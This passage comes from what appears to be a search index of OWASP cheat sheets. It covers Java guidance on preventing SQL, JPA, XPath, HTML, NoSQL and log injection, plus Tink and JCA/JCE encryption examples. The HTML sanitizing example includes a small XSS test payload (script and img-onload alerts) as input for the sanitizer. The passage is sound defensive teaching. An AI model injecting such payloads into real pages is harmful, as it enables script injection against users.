(PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"orange\");\ndeletedRecordCount = pStatement.executeUpdate();\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#jpa","title":"JPA","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_1","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build a JPA query using a String and executes it. It's quite similar to SQL injection, but here the altered language is not SQL but JPA QL.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_1","title":"How to prevent","text":"

Use Java Persistence Query Language Query Parameterization in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_1","title":"Example","text":"
EntityManager entityManager = null;\ntry {\n/* Get a ref on EntityManager to access DB */\nentityManager = Persistence.createEntityManagerFactory(\"testJPA\").createEntityManager();\n\n/* Define parameterized query prototype using named parameter to enhance readability */\nString queryPrototype = \"select c from Color c where c.friendlyName = :colorName\";\n\n/* Create the query, set the named parameter and execute the query */\nQuery queryObject = entityManager.createQuery(queryPrototype);\nColor c = (Color) queryObject.setParameter(\"colorName\", \"yellow\").getSingleResult();\n\n} finally {\nif (entityManager != null && entityManager.isOpen()) {\nentityManager.close();\n}\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_1","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#operating-system","title":"Operating System","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_2","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build an Operating System command using a String and executes it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_2","title":"How to prevent","text":"

Use technology stack API in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_2","title":"Example","text":"
/* The context taken is, for example, to perform a PING against a computer.\n* The prevention is to use the feature provided by the Java API instead of building\n* a system command as String and execute it */\nInetAddress host = InetAddress.getByName(\"localhost\");\nvar reachable = host.isReachable(5000);\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_2","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#xml-xpath-injection","title":"XML: XPath Injection","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_3","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build an XPath query using a String and executes it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_3","title":"How to prevent","text":"

Use XPath Variable Resolver in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_3","title":"Example","text":"

Variable Resolver implementation.

/**\n * Resolver in order to define parameter for XPATH expression.\n *\n */\npublic class SimpleVariableResolver implements XPathVariableResolver {\n\nprivate final Map<QName, Object> vars = new HashMap<QName, Object>();\n\n/**\n     * External methods to add parameter\n     *\n     * @param name Parameter name\n     * @param value Parameter value\n     */\npublic void addVariable(QName name, Object value) {\nvars.put(name, value);\n}\n\n/**\n     * {@inheritDoc}\n     *\n     * @see javax.xml.xpath.XPathVariableResolver#resolveVariable(javax.xml.namespace.QName)\n     */\npublic Object resolveVariable(QName variableName) {\nreturn vars.get(variableName);\n}\n}\n

Code using it to perform XPath query.

/*Create a XML document builder factory*/\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n\n/*Disable External Entity resolution for different cases*/\n//Do not performed here in order to focus on variable resolver code\n//but do it for production code !\n\n/*Load XML file*/\nDocumentBuilder builder = dbf.newDocumentBuilder();\nDocument doc = builder.parse(new File(\"src/test/resources/SampleXPath.xml\"));\n\n/* Create and configure parameter resolver */\nString bid = \"bk102\";\nSimpleVariableResolver variableResolver = new SimpleVariableResolver();\nvariableResolver.addVariable(new QName(\"bookId\"), bid);\n\n/*Create and configure XPATH expression*/\nXPath xpath = XPathFactory.newInstance().newXPath();\nxpath.setXPathVariableResolver(variableResolver);\nXPathExpression xPathExpression = xpath.compile(\"//book[@id=$bookId]\");\n\n/* Apply expression on XML document */\nObject nodes = xPathExpression.evaluate(doc, XPathConstants.NODESET);\nNodeList nodesList = (NodeList) nodes;\nElement book = (Element)nodesList.item(0);\nvar containsRalls = book.getTextContent().contains(\"Ralls, Kim\");\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_3","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#htmljavascriptcss","title":"HTML/JavaScript/CSS","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_4","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build an HTTP response and sends it to the browser.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_4","title":"How to prevent","text":"

Either apply strict input validation (\"allow list\" approach) or use output sanitizing+escaping if input validation is not possible (combine both whenever possible).

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_4","title":"Example","text":"
/*\nINPUT WAY: Receive data from user\nHere it's recommended to use strict input validation using an \"allow list\" approach.\nIn fact, you ensure that only allowed characters are part of the input received.\n*/\n\nString userInput = \"You user login is owasp-user01\";\n\n/* First we check that the value contains only expected characters*/\nif (!Pattern.matches(\"[a-zA-Z0-9\\\\s\\\\-]{1,50}\", userInput))\n{\nreturn false;\n}\n\n/* If the first check passes then ensure that potentially dangerous characters\nthat we have allowed for business requirements are not used in a dangerous way.\nFor example here we have allowed the character '-', and this can\nbe used in SQL injection, so we\nensure that this character is not used in a continuous form.\nUse the API COMMONS LANG v3 to help in String analysis...\n*/\nif (0 != StringUtils.countMatches(userInput.replace(\" \", \"\"), \"--\"))\n{\nreturn false;\n}\n\n/*\nOUTPUT WAY: Send data to user\nHere we escape + sanitize any data sent to the user\nUse the OWASP Java HTML Sanitizer API to handle sanitizing\nUse the OWASP Java Encoder API to handle HTML tag encoding (escaping)\n*/\n\nString outputToUser = \"You <p>user login</p> is <strong>owasp-user01</strong>\";\noutputToUser += \"<script>alert(22);</script><img src='#' onload='javascript:alert(23);'>\";\n\n/* Create a sanitizing policy that only allows the tags '<p>' and '<strong>'*/\nPolicyFactory policy = new HtmlPolicyBuilder().allowElements(\"p\", \"strong\").toFactory();\n\n/* Sanitize the output that will be sent to the user*/\nString safeOutput = policy.sanitize(outputToUser);\n\n/* Encode HTML Tag*/\nsafeOutput = Encode.forHtml(safeOutput);\nString finalSafeOutputExpected = \"You <p>user login</p> is <strong>owasp-user01</strong>\";\nif (!finalSafeOutputExpected.equals(safeOutput))\n{\nreturn false;\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_4","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#ldap","title":"LDAP","text":"

A dedicated cheatsheet has been created.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#nosql","title":"NoSQL","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_5","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build a NoSQL API call expression.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_5","title":"How to prevent","text":"

As there are many NoSQL database systems and each one uses its own API for calls, it's important to ensure that user input received and used to build the API call expression does not contain any character that has a special meaning in the target API syntax. This prevents the input from being used to escape the initial call expression and create another one based on crafted user input. It's also important not to use string concatenation to build the API call expression, but to use the API itself to create the expression.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-mongodb","title":"Example - MongoDB","text":"
 /* Here use MongoDB as target NoSQL DB */\nString userInput = \"Brooklyn\";\n\n/* First ensure that the input does not contain any special characters\nfor the current NoSQL DB call API,\nhere they are: ' \" \\ ; { } $\n*/\n//Avoid regexp this time in order to make the validation code\n//easier to read and understand...\nArrayList < String > specialCharsList = new ArrayList < String > () {\n{\nadd(\"'\");\nadd(\"\\\"\");\nadd(\"\\\\\");\nadd(\";\");\nadd(\"{\");\nadd(\"}\");\nadd(\"$\");\n}\n};\n\nfor (String specChar: specialCharsList) {\nif (userInput.contains(specChar)) {\nreturn false;\n}\n}\n\n//Also add a check on the input max size\nif (userInput.length() > 50)\n{\nreturn false;\n}\n\n/* Then perform query on database using API to build expression */\n//Connect to the local MongoDB instance\ntry(MongoClient mongoClient = new MongoClient()){\nMongoDatabase db = mongoClient.getDatabase(\"test\");\n//Use API query builder to create call expression\n//Create expression\nBson expression = eq(\"borough\", userInput);\n//Perform call\nFindIterable<org.bson.Document> restaurants = db.getCollection(\"restaurants\").find(expression);\n//Verify result consistency\nrestaurants.forEach(new Block<org.bson.Document>() {\n@Override\npublic void apply(final org.bson.Document doc) {\nString restBorough = (String)doc.get(\"borough\");\nif (!\"Brooklyn\".equals(restBorough))\n{\nthrow new IllegalStateException(\"Result is not consistent!\");\n}\n}\n});\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_5","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#log-injection","title":"Log Injection","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_6","title":"Symptom","text":"

Log Injection occurs when an application includes untrusted data in an application log message (e.g., an attacker can cause an additional log entry that looks like it came from a completely different user, if they can inject CRLF characters in the untrusted data). More information about this attack is available on the OWASP Log Injection page.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_6","title":"How to prevent","text":"

To prevent an attacker from writing malicious content into the application log, apply defenses such as:

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-using-log4j2","title":"Example using Log4j2","text":"

Configuration of a logging policy to roll on 10 files of 5MB each, and encode/limit the log message using the Pattern encode{}{CRLF}, introduced in Log4j2 v2.10.0, and the -500m message size limit:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Configuration status=\"error\" name=\"SecureLoggingPolicy\">\n<Appenders>\n<RollingFile name=\"RollingFile\" fileName=\"App.log\" filePattern=\"App-%i.log\" ignoreExceptions=\"false\">\n<PatternLayout>\n<!-- Encode any CRLF chars in the message and limit its\n                     maximum size to 500 characters -->\n<Pattern>%d{ISO8601} %-5p - %encode{ %.-500m }{CRLF}%n</Pattern>\n</PatternLayout>\n<Policies>\n<SizeBasedTriggeringPolicy size=\"5MB\"/>\n</Policies>\n<DefaultRolloverStrategy max=\"10\"/>\n</RollingFile>\n</Appenders>\n<Loggers>\n<Root level=\"debug\">\n<AppenderRef ref=\"RollingFile\"/>\n</Root>\n</Loggers>\n</Configuration>\n

Usage of the logger at code level:

import org.apache.logging.log4j.LogManager;\nimport org.apache.logging.log4j.Logger;\n...\n// No special action needed because security actions are\n// performed at the logging policy level\nLogger logger = LogManager.getLogger(MyClass.class);\nlogger.info(logMessage);\n...\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-using-logback-with-the-owasp-security-logging-library","title":"Example using Logback with the OWASP Security Logging library","text":"

Configuration of a logging policy to roll on 10 files of 5MB each, and encode/limit the log message using the CRLFConverter, provided by the no longer active OWASP Security Logging Project, and the -500msg message size limit:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n<!-- Define the CRLFConverter -->\n<conversionRule conversionWord=\"crlf\" converterClass=\"org.owasp.security.logging.mask.CRLFConverter\" />\n<appender name=\"RollingFile\" class=\"ch.qos.logback.core.rolling.RollingFileAppender\">\n<file>App.log</file>\n<rollingPolicy class=\"ch.qos.logback.core.rolling.FixedWindowRollingPolicy\">\n<fileNamePattern>App-%i.log</fileNamePattern>\n<minIndex>1</minIndex>\n<maxIndex>10</maxIndex>\n</rollingPolicy>\n<triggeringPolicy class=\"ch.qos.logback.core.rolling.SizeBasedTriggeringPolicy\">\n<maxFileSize>5MB</maxFileSize>\n</triggeringPolicy>\n<encoder>\n<!-- Encode any CRLF chars in the message and limit\n                 its maximum size to 500 characters -->\n<pattern>%relative [%thread] %-5level %logger{35} - %crlf(%.-500msg) %n</pattern>\n</encoder>\n</appender>\n<root level=\"debug\">\n<appender-ref ref=\"RollingFile\" />\n</root>\n</configuration>\n

You also have to add the OWASP Security Logging dependency to your project.

Usage of the logger at code level:

import org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n...\n// No special action needed because security actions\n// are performed at the logging policy level\nLogger logger = LoggerFactory.getLogger(MyClass.class);\nlogger.info(logMessage);\n...\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_6","title":"References","text":"
Note that the default Log4j2 encode{} encoder is HTML, which does NOT prevent log injection.\n\nIt prevents XSS attacks against viewing logs using a browser.\n\nOWASP recommends defending against XSS attacks in such situations in the log viewer application itself,\nnot by pre-encoding all the log messages with HTML encoding, as such log entries may be used/viewed in many\nother log viewing/analysis tools that don't expect the log data to be pre-HTML encoded.\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#general-cryptography-guidance","title":"General cryptography guidance","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#encryption-for-storage","title":"Encryption for storage","text":"

Follow the algorithm guidance in the OWASP Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symmetric-example-using-google-tink","title":"Symmetric example using Google Tink","text":"

Google Tink has documentation on performing common tasks.

For example, this page (from Google's website) shows how to perform simple symmetric encryption.

The following code snippet shows an encapsulated use of this functionality:

Click here to view the \"Tink symmetric encryption\" code snippet.
import static java.nio.charset.StandardCharsets.UTF_8;\n\nimport com.google.crypto.tink.Aead;\nimport com.google.crypto.tink.InsecureSecretKeyAccess;\nimport com.google.crypto.tink.KeysetHandle;\nimport com.google.crypto.tink.TinkJsonProtoKeysetFormat;\nimport com.google.crypto.tink.aead.AeadConfig;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.Base64;\n\n// AesGcmSimpleTest\npublic class App {\n\n// Based on example from:\n// https://github.com/tink-crypto/tink-java/tree/main/examples/aead\n\npublic static void main(String[] args) throws Exception {\n\n// Key securely generated using:\n// tinkey create-keyset --key-template AES128_GCM --out-format JSON --out aead_test_keyset.json\n\n\n\n// Register all AEAD key types with the Tink runtime.\nAeadConfig.register();\n\n// Read the keyset into a KeysetHandle.\nKeysetHandle handle =\nTinkJsonProtoKeysetFormat.parseKeyset(\nnew String(Files.readAllBytes( Paths.get(\"/home/fredbloggs/aead_test_keyset.json\")), UTF_8), InsecureSecretKeyAccess.get());\n\nString message = \"This message to be encrypted\";\nSystem.out.println(message);\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata = \"Sender: fredbloggs@example.com\";\n\n// Encrypt the message\nbyte[] cipherText = AesGcmSimple.encrypt(message, metadata, handle);\nSystem.out.println(Base64.getEncoder().encodeToString(cipherText));\n\n// Decrypt the message\nString message2 = AesGcmSimple.decrypt(cipherText, metadata, handle);\nSystem.out.println(message2);\n}\n}\n\nclass AesGcmSimple {\n\npublic static byte[] encrypt(String plaintext, String metadata, KeysetHandle handle) throws Exception {\n// Get the primitive.\nAead aead = handle.getPrimitive(Aead.class);\nreturn aead.encrypt(plaintext.getBytes(UTF_8), metadata.getBytes(UTF_8));\n}\n\npublic static String decrypt(byte[] ciphertext, String metadata, KeysetHandle handle) throws Exception {\n// Get the primitive.\nAead aead = handle.getPrimitive(Aead.class);\nreturn new String(aead.decrypt(ciphertext, metadata.getBytes(UTF_8)),UTF_8);\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symmetric-example-using-built-in-jcajce-classes","title":"Symmetric example using built-in JCA/JCE classes","text":"

If you absolutely cannot use a separate library, it is still possible to use the built-in JCA/JCE classes, but it is strongly recommended to have a cryptography expert review the full design and code, as even the most trivial error can severely weaken your encryption.

The following code snippet shows an example of using AES-GCM to perform encryption/decryption of data.

A few constraints/pitfalls with this code:

Click here to view the \"JCA/JCE symmetric encryption\" code snippet.
import java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport javax.crypto.spec.*;\nimport javax.crypto.*;\nimport java.util.Base64;\n\n\n// AesGcmSimpleTest\nclass Main {\n\npublic static void main(String[] args) throws Exception {\n// Key of 32 bytes / 256 bits for AES\nKeyGenerator keyGen = KeyGenerator.getInstance(AesGcmSimple.ALGORITHM);\nkeyGen.init(AesGcmSimple.KEY_SIZE, new SecureRandom());\nSecretKey secretKey = keyGen.generateKey();\n\n// Nonce of 12 bytes / 96 bits and this size should always be used.\n// It is critical for AES-GCM that a unique nonce is used for every cryptographic operation.\nbyte[] nonce = new byte[AesGcmSimple.IV_LENGTH];\nSecureRandom random = new SecureRandom();\nrandom.nextBytes(nonce);\n\nvar message = \"This message to be encrypted\";\nSystem.out.println(message);\n\n// Encrypt the message\nbyte[] cipherText = AesGcmSimple.encrypt(message, nonce, secretKey);\nSystem.out.println(Base64.getEncoder().encodeToString(cipherText));\n\n// Decrypt the message\nvar message2 = AesGcmSimple.decrypt(cipherText, nonce, secretKey);\nSystem.out.println(message2);\n}\n}\n\nclass AesGcmSimple {\n\npublic static final String ALGORITHM = \"AES\";\npublic static final String CIPHER_ALGORITHM = \"AES/GCM/NoPadding\";\npublic static final int KEY_SIZE = 256;\npublic static final int TAG_LENGTH = 128;\npublic static final int IV_LENGTH = 12;\n\npublic static byte[] encrypt(String plaintext, byte[] nonce, SecretKey secretKey) throws Exception {\nreturn cryptoOperation(plaintext.getBytes(StandardCharsets.UTF_8), nonce, secretKey, Cipher.ENCRYPT_MODE);\n}\n\npublic static String decrypt(byte[] ciphertext, byte[] nonce, SecretKey secretKey) throws Exception {\nreturn new String(cryptoOperation(ciphertext, nonce, secretKey, Cipher.DECRYPT_MODE), StandardCharsets.UTF_8);\n}\n\nprivate static byte[] cryptoOperation(byte[] text, byte[] nonce, SecretKey secretKey, int mode) throws Exception {\nCipher cipher = Cipher.getInstance(CIPHER_ALGORITHM);\nGCMParameterSpec gcmParameterSpec = new GCMParameterSpec(TAG_LENGTH, nonce);\ncipher.init(mode, secretKey, gcmParameterSpec);\nreturn cipher.doFinal(text);\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#encryption-for-transmission","title":"Encryption for transmission","text":"

Again, follow the algorithm guidance in the OWASP Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#asymmetric-example-using-google-tink","title":"Asymmetric example using Google Tink","text":"

Google Tink has documentation on performing common tasks.

For example, this page (from Google's website) shows how to perform a hybrid encryption process where two parties want to share data based on their asymmetric key pair.

The following code snippet shows how this functionality can be used to share secrets between Alice and Bob:

Click here to view the \"Tink hybrid encryption\" code snippet.
import static java.nio.charset.StandardCharsets.UTF_8;\n\nimport com.google.crypto.tink.HybridDecrypt;\nimport com.google.crypto.tink.HybridEncrypt;\nimport com.google.crypto.tink.InsecureSecretKeyAccess;\nimport com.google.crypto.tink.KeysetHandle;\nimport com.google.crypto.tink.TinkJsonProtoKeysetFormat;\nimport com.google.crypto.tink.hybrid.HybridConfig;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.Base64;\n\n// HybridReplaceTest\nclass App {\npublic static void main(String[] args) throws Exception {\n/*\n\n        Generated public/private keypairs for Bob and Alice using the\n        following tinkey commands:\n\n        ./tinkey create-keyset \\\n        --key-template DHKEM_X25519_HKDF_SHA256_HKDF_SHA256_AES_256_GCM \\\n        --out-format JSON --out alice_private_keyset.json\n\n        ./tinkey create-keyset \\\n        --key-template DHKEM_X25519_HKDF_SHA256_HKDF_SHA256_AES_256_GCM \\\n        --out-format JSON --out bob_private_keyset.json\n\n        ./tinkey create-public-keyset --in alice_private_keyset.json \\\n        --in-format JSON --out-format JSON --out alice_public_keyset.json\n\n        ./tinkey create-public-keyset --in bob_private_keyset.json \\\n        --in-format JSON --out-format JSON --out bob_public_keyset.json\n        */\n\nHybridConfig.register();\n\n// Generate ECC key pair for Alice\nvar alice = new HybridSimple(\ngetKeysetHandle(\"/home/alicesmith/private_keyset.json\"),\ngetKeysetHandle(\"/home/alicesmith/public_keyset.json\")\n\n);\n\nKeysetHandle alicePublicKey = alice.getPublicKey();\n\n// Generate ECC key pair for Bob\nvar bob = new HybridSimple(\ngetKeysetHandle(\"/home/bobjones/private_keyset.json\"),\ngetKeysetHandle(\"/home/bobjones/public_keyset.json\")\n\n);\n\nKeysetHandle bobPublicKey = bob.getPublicKey();\n\n// This keypair generation shoud be reperformed every so often in order to\n// obtain a new shared secret to avoid a long lived shared secret.\n\n// Alice encrypts a message to send to Bob\nString plaintext = \"Hello, Bob!\";\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata = \"Sender: alicesmith@example.com\";\n\nSystem.out.println(\"Secret being sent from Alice to Bob: \" + plaintext);\nvar cipherText = alice.encrypt(bobPublicKey, plaintext, metadata);\nSystem.out.println(\"Ciphertext being sent from Alice to Bob: \" + Base64.getEncoder().encodeToString(cipherText));\n\n\n// Bob decrypts the message\nvar decrypted = bob.decrypt(cipherText, metadata);\nSystem.out.println(\"Secret received by Bob from Alice: \" + decrypted);\nSystem.out.println();\n\n// Bob encrypts a message to send to Alice\nString plaintext2 = \"Hello, Alice!\";\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata2 = \"Sender: bobjones@example.com\";\n\nSystem.out.println(\"Secret being sent from Bob to Alice: \" + plaintext2);\nvar cipherText2 = bob.encrypt(alicePublicKey, plaintext2, metadata2);\nSystem.out.println(\"Ciphertext being sent from Bob to Alice: \" + Base64.getEncoder().encodeToString(cipherText2));\n\n// Bob decrypts the message\nvar decrypted2 = alice.decrypt(cipherText2, metadata2);\nSystem.out.println(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n\nprivate static KeysetHandle getKeysetHandle(String filename) throws Exception\n{\nreturn TinkJsonProtoKeysetFormat.parseKeyset(\nnew String(Files.readAllBytes( Paths.get(filename)), UTF_8), 
InsecureSecretKeyAccess.get());\n}\n}\nclass HybridSimple {\n\nprivate KeysetHandle privateKey;\nprivate KeysetHandle publicKey;\n\n\npublic HybridSimple(KeysetHandle privateKeyIn, KeysetHandle publicKeyIn) throws Exception {\nprivateKey = privateKeyIn;\npublicKey = publicKeyIn;\n}\n\npublic KeysetHandle getPublicKey() {\nreturn publicKey;\n}\n\npublic byte[] encrypt(KeysetHandle partnerPublicKey, String message, String metadata) throws Exception {\n\nHybridEncrypt encryptor = partnerPublicKey.getPrimitive(HybridEncrypt.class);\n\n// return the encrypted value\nreturn encryptor.encrypt(message.getBytes(UTF_8), metadata.getBytes(UTF_8));\n}\npublic String decrypt(byte[] ciphertext, String metadata) throws Exception {\n\nHybridDecrypt decryptor = privateKey.getPrimitive(HybridDecrypt.class);\n\n// return the decrypted value\nreturn new String(decryptor.decrypt(ciphertext, metadata.getBytes(UTF_8)),UTF_8);\n}\n\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#asymmetric-example-using-built-in-jcajce-classes","title":"Asymmetric example using built-in JCA/JCE classes","text":"

If you absolutely cannot use a separate library, it is still possible to use the built-in JCA/JCE classes, but it is strongly recommended to have a cryptography expert review the full design and code, as even the most trivial error can severely weaken your encryption.

The following code snippet shows an example of using Elliptic Curve Diffie-Hellman (ECDH) together with AES-GCM to perform encryption/decryption of data between two different sides without the need to transfer the symmetric key between the two sides. Instead, the sides exchange public keys and can then use ECDH to generate a shared secret which can be used for the symmetric encryption.

Note that this code sample relies on the AesGcmSimple class from the previous section.

A few constraints/pitfalls with this code:

Click here to view the \"JCA/JCE hybrid encryption\" code snippet.
import java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport javax.crypto.spec.*;\nimport javax.crypto.*;\nimport java.util.*;\nimport java.security.*;\nimport java.security.spec.*;\nimport java.util.Arrays;\n\n// ECDHSimpleTest\nclass Main {\npublic static void main(String[] args) throws Exception {\n\n// Generate ECC key pair for Alice\nvar alice = new ECDHSimple();\nKey alicePublicKey = alice.getPublicKey();\n\n// Generate ECC key pair for Bob\nvar bob = new ECDHSimple();\nKey bobPublicKey = bob.getPublicKey();\n\n// This keypair generation shoud be reperformed every so often in order to \n// obtain a new shared secret to avoid a long lived shared secret.\n\n// Alice encrypts a message to send to Bob\nString plaintext = \"Hello\"; //, Bob!\";\nSystem.out.println(\"Secret being sent from Alice to Bob: \" + plaintext);\n\nvar retPair = alice.encrypt(bobPublicKey, plaintext);\nvar nonce = retPair.getKey();\nvar cipherText = retPair.getValue();\n\nSystem.out.println(\"Both cipherText and nonce being sent from Alice to Bob: \" + Base64.getEncoder().encodeToString(cipherText) + \" \" + Base64.getEncoder().encodeToString(nonce));\n\n\n// Bob decrypts the message\nvar decrypted = bob.decrypt(alicePublicKey, cipherText, nonce);\nSystem.out.println(\"Secret received by Bob from Alice: \" + decrypted);\nSystem.out.println();\n\n// Bob encrypts a message to send to Alice\nString plaintext2 = \"Hello\"; //, Alice!\";\nSystem.out.println(\"Secret being sent from Bob to Alice: \" + plaintext2);\n\nvar retPair2 = bob.encrypt(alicePublicKey, plaintext2);\nvar nonce2 = retPair2.getKey();\nvar cipherText2 = retPair2.getValue();\nSystem.out.println(\"Both cipherText2 and nonce2 being sent from Bob to Alice: \" + Base64.getEncoder().encodeToString(cipherText2) + \" \" + Base64.getEncoder().encodeToString(nonce2));\n\n// Bob decrypts the message\nvar decrypted2 = alice.decrypt(bobPublicKey, cipherText2, nonce2);\nSystem.out.println(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n}\nclass ECDHSimple {\nprivate KeyPair keyPair;\n\npublic class AesKeyNonce {\npublic SecretKey Key;\npublic byte[] Nonce;\n}\n\npublic ECDHSimple() throws Exception {\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"EC\");\nECGenParameterSpec ecSpec = new ECGenParameterSpec(\"secp256r1\"); // Using secp256r1 curve\nkeyPairGenerator.initialize(ecSpec);\nkeyPair = keyPairGenerator.generateKeyPair();\n}\n\npublic Key getPublicKey() {\nreturn keyPair.getPublic();\n}\n\npublic AbstractMap.SimpleEntry<byte[], byte[]> encrypt(Key partnerPublicKey, String message) throws Exception {\n\n// Generate the AES Key and Nonce\nAesKeyNonce aesParams = generateAESParams(partnerPublicKey);\n\n// return the encrypted value\nreturn new AbstractMap.SimpleEntry<>(\naesParams.Nonce,\nAesGcmSimple.encrypt(message, aesParams.Nonce, aesParams.Key)\n);\n}\npublic String decrypt(Key partnerPublicKey, byte[] ciphertext, byte[] nonce) throws Exception {\n\n// Generate the AES Key and Nonce\nAesKeyNonce aesParams = generateAESParams(partnerPublicKey, nonce);\n\n// return the decrypted value\nreturn AesGcmSimple.decrypt(ciphertext, aesParams.Nonce, aesParams.Key);\n}\n\nprivate AesKeyNonce generateAESParams(Key partnerPublicKey, byte[] nonce) throws Exception {\n\n// Derive the secret based on this side's private key and the other side's public key \nKeyAgreement keyAgreement = KeyAgreement.getInstance(\"ECDH\");\nkeyAgreement.init(keyPair.getPrivate());\nkeyAgreement.doPhase(partnerPublicKey, true);\nbyte[] 
secret = keyAgreement.generateSecret();\n\nAesKeyNonce aesKeyNonce = new AesKeyNonce();\n\n// Copy first 32 bytes as the key\nbyte[] key = Arrays.copyOfRange(secret, 0, (AesGcmSimple.KEY_SIZE / 8));\naesKeyNonce.Key = new SecretKeySpec(key, 0, key.length, \"AES\");\n\n// Passed in nonce will be used.\naesKeyNonce.Nonce = nonce;\nreturn aesKeyNonce;\n\n}\n\nprivate AesKeyNonce generateAESParams(Key partnerPublicKey) throws Exception {\n\n// Nonce of 12 bytes / 96 bits and this size should always be used.\n// It is critical for AES-GCM that a unique nonce is used for every cryptographic operation.\n// Therefore this is not generated from the shared secret\nbyte[] nonce = new byte[AesGcmSimple.IV_LENGTH];\nSecureRandom random = new SecureRandom();\nrandom.nextBytes(nonce);\nreturn generateAESParams(partnerPublicKey, nonce);\n\n}\n}\n
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html","title":"Key Management Cheat Sheet","text":""},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Key Management Cheat Sheet provides developers with guidance for implementing cryptographic key management within an application in a secure manner. It is important to document and harmonize rules and practices for:

  1. key life cycle management (generation, distribution, destruction)
  2. key compromise, recovery and zeroization
  3. key storage
  4. key agreement
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#general-guidelines-and-considerations","title":"General Guidelines and Considerations","text":"

Formulate a plan for the overall organization's cryptographic strategy to guide developers working on different applications and ensure that each application's cryptographic capability meets minimum requirements and best practices.

Identify the cryptographic and key management requirements for your application and map all components that process or store cryptographic key material.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-selection","title":"Key Selection","text":"

Selection of the cryptographic and key management algorithms to use within a given application should begin with an understanding of the objectives of the application.

For example, if the application is required to store data securely, then the developer should select an algorithm suite that supports the objective of data at rest protection security. Applications that are required to transmit and receive data would select an algorithm suite that supports the objective of data in transit protection.

We have provided recommendations on the selection of crypto suites within an application based on application and security objectives. Application developers oftentimes begin the development of crypto and key management capabilities by examining what is available in a library.

However, an analysis of the real needs of the application should be conducted to determine the optimal key management approach. Begin by understanding the security objectives of the application which will then drive the selection of cryptographic protocols that are best suited. For example, the application may require:

  1. Confidentiality of data at rest and confidentiality of data in transit.
  2. Authenticity of the end device.
  3. Authenticity of data origin.
  4. Integrity of data in transit.
  5. Keys to create the data encryption keys.

Once the understanding of the security needs of the application is achieved, developers can determine what protocols and algorithms are required. Once the protocols and algorithms are understood, you can begin to define the different types of keys that will support the application's objectives.

